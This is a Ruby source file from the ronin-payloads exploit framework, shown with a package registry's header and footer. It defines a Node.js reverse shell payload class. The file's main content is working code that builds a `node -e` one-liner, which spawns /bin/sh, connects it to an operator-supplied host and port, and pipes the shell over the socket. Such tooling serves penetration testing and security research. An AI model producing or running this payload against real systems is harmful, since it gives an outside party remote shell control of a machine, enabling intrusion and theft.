Sha256: 44f34fdc0cd069487813f743afe4c61a4e31f94328b80b352f9bdb80cc72bbca
Contents?: true
Size: 1.77 KB
Versions: 3
Compression:
Stored size: 1.77 KB
Contents
# frozen_string_literal: true
#
# ronin-payloads - A Ruby micro-framework for writing and running exploit
# payloads.
#
# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# ronin-payloads is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ronin-payloads is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with ronin-payloads. If not, see <https://www.gnu.org/licenses/>.
#
require 'ronin/payloads/command_payload'
require 'ronin/payloads/mixins/reverse_shell'
module Ronin
module Payloads
module CMD
module NodeJS
#
# A basic `node` (Node.js) reverse shell command.
#
class ReverseShell < CommandPayload
include Mixins::ReverseShell
register 'cmd/node/reverse_shell'
description <<~DESC
A basic `node` (Node.js) reverse shell command.
DESC
#
# Builds the `node` reverse shell command.
#
def build
js = %{(function(){var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(#{port}, #{host.dump}, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();}
@payload = %{node -e '#{js}'}
end
end
end
end
end
end
Version data entries
3 entries across 3 versions & 1 rubygems